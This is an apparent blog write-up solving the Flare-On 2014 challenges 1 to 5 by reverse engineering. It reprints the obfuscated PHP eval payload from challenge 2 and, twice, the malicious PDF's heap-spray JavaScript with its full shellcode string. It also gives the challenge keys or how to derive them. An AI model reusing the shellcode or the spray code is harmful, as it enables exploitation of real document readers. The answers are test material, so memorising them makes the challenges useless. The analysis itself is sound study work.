Flare-on 1

Flare-on 2014

Link to Lab : https://cyberdefenders.org/blueteam-ctf-challenges/24#nav-questions

Q1 .Challenge 1 – Challenge1.exe key?

The file was built from .NET 2.0 (based on the mscorlib import). That'll be important later to determine what tool to analyze the file in -> I use DotPeek to do this .

Checking the execute the file to see what happened :

Also, it requires downloading .Net 2.0 or 3.0 if your computer doesn't have it.

Continue DotPeek to understand what this challenge file is doing:

After looking around , start from main() function and move to this :

Look on the decode button being drawn on the screen with button.text = "DECODE"; and a subroutine applied to this button with button.Click += new EventHandler(this.btnDecode_Click); My suggestion in this case is to look for the method btnDecode_Click, which displays:

Data might from : byte[] datSecret = Resources.dat_secret; -> so will need find this data and do the xor math like that to find the message when decode

Data_secret will import from this file -> so save it to outside this file :

Now , do with basic math step by step from this , because the math in here like Decode -> Encode -> print out to the screen , so we will take first math to decode the data we need :

Solution 2 : Fastest way ( Using Process Hacker )

Running the File Challenge and click button DECODE then open Process Hacker :

Then Open Strings -> Search -> Click Ok

Now we can Filter the Strings -> search key word flare contains to look :

And I got the flag :

Q2. Challenge 2 – flare-on.png key?

At this challenge contain 1 file png and html .

So let take a look on html

Now move on .png file

When I open it with HXD, I see some php in here, please take it out and see more clearly :

<?php $terms = [
    "M","Z","]","p","\\","w","f","1","v","<","a","Q","z"," ","s","m","+","E","D","g","W","\"",
    "q","y","T","V","n","S","X",")","9","C","P","r","&","\'","!","x","G",":","2","~","O","h",
    "u","U","@",";","H","3","F","6","b","L",">","^",",",".","l","$","d","`","%","N","*","[",
    "0","}","J","-","5","_","A","=","{","k","o","7","#","i","I","Y","(","j","/","?","K","c","B","t","R","4","8","e","|",];
    
    order = [
    59,71,73,13,35,10,20,81,76,10,28,63,12,1,28,11,76,68,50,30,11,24,7,63,45,20,23,68,87,42,24,60,87,63,18,58,87,63,18,58,87,63,83,43,87,93,18,90,38,28,18,19,66,28,18,17,37,63,58,37,91,63,83,43,87,42,24,
    60,87,93,18,87,66,28,48,19,66,63,50,37,91,63,17,1,87,93,18,45,66,28,48,19,40,11,25,5,70,63,7,37,91,63,12,1,87,93,18,81,37,28,48,19,12,63,25,37,91,63,83,63,87,93,18,87,23,28,18,75,49,28,48,19,49,0,50,37,91,63,18,
    50,87,42,18,90,87,93,18,81,40,28,48,19,40,11,7,5,70,63,7,37,91,63,12,68,87,93,18,81,7,28,48,19,66,63,50,5,40,63,25,37,91,63,24,63,87,63,12,68,87,0,24,17,37,28,18,17,37,0,50,5,40,42,50,5,49,42,25,5,91,63,50,5,70,
    42,25,37,91,63,75,1,87,93,18,1,17,80,58,66,3,86,27,88,77,80,38,25,40,81,20,5,76,81,15,50,12,1,24,81,66,28,40,90,58,81,40,30,75,1,27,19,75,28,7,88,32,45,7,90,52,80,58,5,70,63,7,5,66,42,25,37,91,0,12,50,87,63,83,43,
    87,93,18,90,38,28,48,19,7,63,50,5,37,0,24,1,87,0,24,72,66,28,48,19,40,0,25,5,37,0,24,1,87,93,18,11,66,28,18,87,70,28,48,19,7,63,50,5,37,0,18,1,87,42,24,60,87,0,24,17,91,28,18,75,49,28,18,45,12,28,48,19,40,0,7,5,37,
    0,24,90,87,93,18,81,37,28,48,19,49,0,50,5,40,63,25,5,91,63,50,5,37,0,18,68,87,93,18,1,18,28,48,19,40,0,25,5,37,0,24,90,87,0,24,72,37,28,48,19,66,63,50,5,40,63,25,37,91,63,24,63,87,63,12,68,87,0,24,17,37,28,48,19,40,
    90,25,37,91,63,18,90,87,93,18,90,38,28,18,19,66,28,18,75,70,28,48,19,40,90,58,37,91,63,75,11,79,28,27,75,3,42,23,88,30,35,47,59,71,71,73,35,68,38,63,8,1,38,45,30,81,15,50,12,1,24,81,66,28,40,90,58,81,40,30,75,1,27,19,
    75,28,23,75,77,1,28,1,43,52,31,19,75,81,40,30,75,1,27,75,77,35,47,59,71,71,71,73,21,4,37,51,40,4,7,91,7,4,37,77,49,4,7,91,70,4,37,49,51,4,51,91,4,37,70,6,4,7,91,91,4,37,51,70,4,7,91,49,4,37,51,6,4,7,91,91,4,37,51,70,21,
    47,93,8,10,58,82,59,71,71,71,82,59,71,71,29,29,47,];
$do_me = "";
for ($i = 0; $i < count($order); $i++) {
    $do_me = $do_me . $terms[$order[$i]];
}
eval($do_me); ?>

Fix the code to execute ( eval -> print )

Edit and got this when execute that new code :

Got this :

Let's decode this message, I will use python for this step and I get a nice looking text message

Continue replace DOT,DASH...message to look it more clearly :

Q3. Challenge 3 – such_evil.exe key?

Take a view about this file type :

Open this file with IDA to see what it have :

it call sub_401000 look interesting and 0×401000 is the beginning of the code section, commonly it is the function had written by user .

So let move to it :

Pass hold this and look at the end :

That showing the binary is calling the location of the first byte move on stack -> need handle the shellcode at this point so let set the break point at call eax -> set before it calling the shellcode ( need run the program to catch it ) .

I will debug this with x32dbg :

Set break-point and step through this loop :

Also saw the first string used as the decryption key in xor math : nopasaurus

Continue step through this loop by setting the break-point over that :

At this xor might look same so we can pass through the math and move it to the call instruction to retrive the flag

Got this message :

Follow the EBX in hex dump :

The Second way : ( Using Process Hacker )

Again do the same like the Challenge 1 : Execute the file then open the Process Hacker -> search for String :

Q4 . Challenge 4 – APT9001.pdf key?

So I have dealt with malicious PDF analysis before (my previous article) so let's move on to REMnux for the best tool for malicious pdf analysis

peepdf -> dump infomation also in Json format in the pdf file

Next use extract with js to extract the javascript code contain in file :

// peepdf comment: Javascript code located in object 6 (version 0)

var HdPN = "";
var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = "";
var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var MPBPtdcBjTlpvyTYkSwgkrWhXL = "";

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 128; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791");
ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg;
OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791");
fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20;
fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length
while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length < fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA) OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY += OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY;
UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
MOysyGgYplwyZzNdETHwkru = OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.substring(0, OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length - fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA);
while (MOysyGgYplwyZzNdETHwkru.length + fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA < 0x40000) MOysyGgYplwyZzNdETHwkru = MOysyGgYplwyZzNdETHwkru + MOysyGgYplwyZzNdETHwkru + UohsTktonqUXUXspNrfyqyqDQlcDfbmbywFjyLJiesb;
DPwxazRhwbQGu = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 100; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) DPwxazRhwbQGu[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = MOysyGgYplwyZzNdETHwkru + ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv;

for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 142; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA >= 0; --EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += unescape("%ub550%u0166");
bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20
while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;
Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT);
QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length - bGtvKT);
while (QCZabMzxQiD.length + bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD + QCZabMzxQiD + Juphd;
FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA = 0; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA < 125; EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA++) FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE[EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA] = QCZabMzxQiD + zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf;

All above code just have look at unescape("%u72f9%u..... because this look like the shellcode -> move on covert this to execute

Deofuscate might help view the code for easy to look :

// peepdf comment: Javascript code located in object 6 (version 0)

var string_1 = "";
var string_2 = "";
var string_3 = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c%u7a4e%u412d%ubbbf%u7705%uf528%u9293%u9990%ua998%u0a47%u14eb%u3d49%u484b%u372f%ub98d%u3478%u0bb4%ud5d2%ue031%u3572%ud610%u6740%u2bbe%u4afd%u041c%u3f97%ufc3a%u7479%u421d%ub7b5%u0c2c%u130d%u25f8%u76b0%u4e79%u7bb1%u0c66%u2dbb%u911c%ua92f%ub82c%u8db0%u0d7e%u3b96%u49d4%ud56b%u03b7%ue1f7%u467d%u77b9%u3d42%u111d%u67e0%u4b92%ueb85%u2471%u9b48%uf902%u4f15%u04ba%ue300%u8727%u9fd6%u4770%u187a%u73e2%ufd1b%u2574%u437c%u4190%u97b6%u1499%u783c%u8337%ub3f8%u7235%u693f%u98f5%u7fbe%u4a75%ub493%ub5a8%u21bf%ufcd0%u3440%u057b%ub2b2%u7c71%u814e%u22e1%u04eb%u884a%u2ce2%u492d%u8d42%u75b3%uf523%u727f%ufc0b%u0197%ud3f7%u90f9%u41be%ua81c%u7d25%ub135%u7978%uf80a%ufd32%u769b%u921d%ubbb4%u77b8%u707e%u4073%u0c7a%ud689%u2491%u1446%u9fba%uc087%u0dd4%u4bb0%ub62f%ue381%u0574%u3fb9%u1b67%u93d5%u8396%u66e0%u47b5%u98b7%u153c%ua934%u3748%u3d27%u4f75%u8cbf%u43e2%ub899%u3873%u7deb%u257a%uf985%ubb8d%u7f91%u9667%ub292%u4879%u4a3c%ud433%u97a9%u377e%ub347%u933d%u0524%u9f3f%ue139%u3571%u23b4%ua8d6%u8814%uf8d1%u4272%u76ba%ufd08%ube41%ub54b%u150d%u4377%u1174%u78e3%ue020%u041c%u40bf%ud510%ub727%u70b1%uf52b%u222f%u4efc%u989b%u901d%ub62c%u4f7c%u342d%u0c66%ub099%u7b49%u787a%u7f7e%u7d73%ub946%ub091%u928d%u90bf%u21b7%ue0f6%u134b%u29f5%u67eb%u2577%ue186%u2a05%u66d6%ua8b9%u1535%u4296%u3498%ub199%ub4ba%ub52c%uf812%u4f93%u7b76%u3079%ubefd%u3f71%u4e40%u7cb3%u2775%ue209%u4324%u0c70%u182d%u02e3%u4af9%ubb47%u41b6%u729f%u9748%ud480%ud528%u749b%u1c3c%ufc84%u497d%u7eb8%ud26b%u1de0%u0d76%u3174%u14eb%u3770%u71a9%u723d%ub246%u2f78%u047f%ub6a9%u1c7b%u3a73%u3ce1%u19be%u34f9%ud500%u037a%ue2f8%ub024%ufd4e%u3d79%u7596%u9b15%u7c49%ub42f%u9f4f%u4799%uc13b%ue3d0%u4014%u903f%u41bf%u4397%ub88d%ub548%u0d77%u4ab2%u2d93%u9267%ub198%ufc1a%ud4b9%ub32c%ubaf5%u690c%u91d6%u04a8%u1dbb%u4666%u2505%u35b7%u3742%u4b27%ufc90%ud233%u30b2%uff64%u5a32%u528b%u8b0c%u1452%u728b%u3328%ub1c9%u3318%u33ff%uacc0%u613c%u027c%u202c%ucfc1%u030d%ue2f8%u81f0%u5bff%u4abc%u8b6a%u105a%u128b%uda75%u538b%u033c%uffd3%u3472%u528b%u0378%u8bd3%u2072%uf303%uc933%uad41%uc303%u3881%u6547%u5074%uf475%u7881%u7204%u636f%u7541%u81eb%u0878%u6464%u6572%ue275%u8b49%u2472%uf303%u8b66%u4e0c%u728b%u031c%u8bf3%u8e14%ud303%u3352%u57ff%u6168%u7972%u6841%u694c%u7262%u4c68%u616f%u5464%uff53%u68d2%u3233%u0101%u8966%u247c%u6802%u7375%u7265%uff54%u68d0%u786f%u0141%udf8b%u5c88%u0324%u6168%u6567%u6842%u654d%u7373%u5054%u54ff%u2c24%u6857%u2144%u2121%u4f68%u4e57%u8b45%ue8dc%u0000%u0000%u148b%u8124%u0b72%ua316%u32fb%u7968%ubece%u8132%u1772%u45ae%u48cf%uc168%ue12b%u812b%u2372%u3610%ud29f%u7168%ufa44%u81ff%u2f72%ua9f7%u0ca9%u8468%ucfe9%u8160%u3b72%u93be%u43a9%ud268%u98a3%u8137%u4772%u8a82%u3b62%uef68%u11a4%u814b%u5372%u47d6%uccc0%ube68%ua469%u81ff%u5f72%ucaa3%u3154%ud468%u65ab%u8b52%u57cc%u5153%u8b57%u89f1%u83f7%u1ec7%ufe39%u0b7d%u3681%u4542%u4645%uc683%ueb04%ufff1%u68d0%u7365%u0173%udf8b%u5c88%u0324%u5068%u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff");
var string_4 = "";

for (var_1 = 128; var_1 >= 0; --var_1) string_4 += unescape("%ub32f%u3791");
var_2 = string_4 + IxTUQnOvHg;
var_3 = unescape("%ub32f%u3791");
var_4 = 20;
string_5 = var_4 + var_2.length
while (var_3.length < string_5) var_3 += var_3;
string_6 = var_3.substring(0, string_5);
string_7 = var_3.substring(0, var_3.length - string_5);
while (string_7.length + string_5 < 0x40000) string_7 = string_7 + string_7 + string_6;
string_8 = new Array();
for (var_1 = 0; var_1 < 100; var_1++) string_8[var_1] = string_7 + var_2;

for (var_1 = 142; var_1 >= 0; --var_1) string_2 += unescape("%ub550%u0166");
string_9 = string_2.length + 20
while (string_2.length < string_9) string_2 += string_2;
string_10 = string_2.substring(0, string_9);
string_11 = string_2.substring(0, string_2.length - string_9);
while (string_11.length + string_9 < 0x40000) string_11 = string_11 + string_11 + string_10;
string_12 = new Array();
for (var_1 = 0; var_1 < 125; var_1++) string_12[var_1] = string_11 + string_2;

The shellcode need covert is in string_3

Set var to test this first -> try converting to hex then see this execute first then can move to dynamic analysis

See some message at here :

It's has a tool call shellcode2exe to make this code -> executable file

Save code to another file

And use shellcode2exe with that :

After this i open with IDA to view the code in assembly to know how it doing :

Xor math again, each push value will xor each with with privous so it was easy now : ( Can keep on static by xor each value outside this and decode from hex can get the flag ).

Q5 . Challenge 5 – 5get_it.exe key?

It's P32 executable again in windows

View on Pe-studio :

Start on DLLMain() :

Moving around i move to this function sub_10009EB0, i found the loop look very large

Press Space to view as Text -> this help easy to look up so at here found the API GetAsyncKeyState which sounds like doing with the keylogger.( or can F5 -> view on pseudocode)

I will move to analyze on Flare VM

Start from sub_1001240() which Flare Message print out and catch the key m

Use X which is Cross references to show that where dword_100194FC is set to:

Set 0 in _cfltcvt_init() note this function for later, and sub_10009AF0 and 1 in sub_10009B60

we have a look at _cfltcvt_init()

void _cfltcvt_init()
{
  dword_10017000 = 1;
  dword_10019460 = 0;
  dword_10019464 = 0;
  dword_10019468 = 0;
  dword_1001946C = 0;
  dword_10019470 = 0;
  dword_10019474 = 0;
  dword_10019478 = 0;
  dword_1001947C = 0;
  dword_10019480 = 0;
  dword_10019484 = 0;
  dword_10019488 = 0;
  dword_1001948C = 0;
  dword_10019490 = 0;
  dword_10019494 = 0;
  dword_10019498 = 0;
  dword_1001949C = 0;
  dword_100194A0 = 0;
  dword_100194A4 = 0;
  dword_100194A8 = 0;
  dword_100194AC = 0;
  dword_100194B0 = 0;
  dword_100194B4 = 0;
  dword_100194B8 = 0;
  dword_100194BC = 0;
  dword_100194C0 = 0;
  dword_100194C4 = 0;
  dword_100194C8 = 0;
  dword_100194CC = 0;
  dword_100194D0 = 0;
  dword_100194D4 = 0;
  dword_100194D8 = 0;
  dword_100194DC = 0;
  dword_100194E0 = 0;
  dword_100194E4 = 0;
  dword_100194E8 = 0;
  dword_100194EC = 0;
  dword_100194F0 = 0;
  dword_100194F4 = 0;
  dword_100194F8 = 0;
  dword_100194FC = 0;
  dword_10019500 = 0;
}

this like a flow of word so let find where all this set

Continue with dword_100194FC is set by o key :

Okay , let move on to check other until we can know all variable dword in function _cfltcvt_init() is set :

Right up on this is dword_100194F8 :

It set to 1 by c in sub_1009850

For faster we can move on function _cfltcvt_init then check references each dword

After find all the key set I note it and see this message :

void _cfltcvt_init()
{
  dword_10017000 = 1; 
  dword_10019460 = 0; // set by 'l' 
  dword_10019464 = 0; // set by '0' 
  dword_10019468 = 0; // set by 'g' 
  dword_1001946C = 0; // set by 'g' 
  dword_10019470 = 0; // set by 'i' 
  dword_10019474 = 0; // set by 'n' 
  dword_10019478 = 0; // set by 'g' 
  dword_1001947C = 0; // set by 'd' 
  dword_10019480 = 0; // set by 'o' 
  dword_10019484 = 0; // set by 't' 
  dword_10019488 = 0; // set by 'u' 
  dword_1001948C = 0; // set by 'r' 
  dword_10019490 = 0; // set by 'd' 
  dword_10019494 = 0; // set by 'o' 
  dword_10019498 = 0; // set by 't' 
  dword_1001949C = 0; // set by '5' 
  dword_100194A0 = 0; // set by 't' 
  dword_100194A4 = 0; // set by 'r' 
  dword_100194A8 = 0; // set by '0' 
  dword_100194AC = 0; // set by 'k' 
  dword_100194B0 = 0; // set by 'e' 
  dword_100194B4 = 0; // set by '5' 
  dword_100194B8 = 0; // set by 'a' 
  dword_100194BC = 0; // set by 't' 
  dword_100194C0 = 0; // set by 'f' 
  dword_100194C4 = 0; // set by 'l' 
  dword_100194C8 = 0; // set by 'a' 
  dword_100194CC = 0; // set by 'r' 
  dword_100194D0 = 0; // set by 'e' 
  dword_100194D4 = 0; // set by 'd' 
  dword_100194D8 = 0; // set by 'a' 
  dword_100194DC = 0; // set by 's' 
  dword_100194E0 = 0; // set by 'h' 
  dword_100194E4 = 0; // set by 'o' 
  dword_100194E8 = 0; // set by 'n' 
  dword_100194EC = 0; // set by 'd' 
  dword_100194F0 = 0; // set by 'o' 
  dword_100194F4 = 0; // set by 't' 
  dword_100194F8 = 0; // set by 'c' 
  dword_100194FC = 0; // set by 'o' 
  dword_10019500 = 0;
}

l0ggingdoturdot5tr0ke5atflaredashondotco

Transfer it and got the flag :( note that need fill letter m at the end )

Challenge 6 – e7bc5d2c0cf4480348f5504196561297 key?

PreviousCyber Defenders NextKrakenKeylogger

Last updated 1 year ago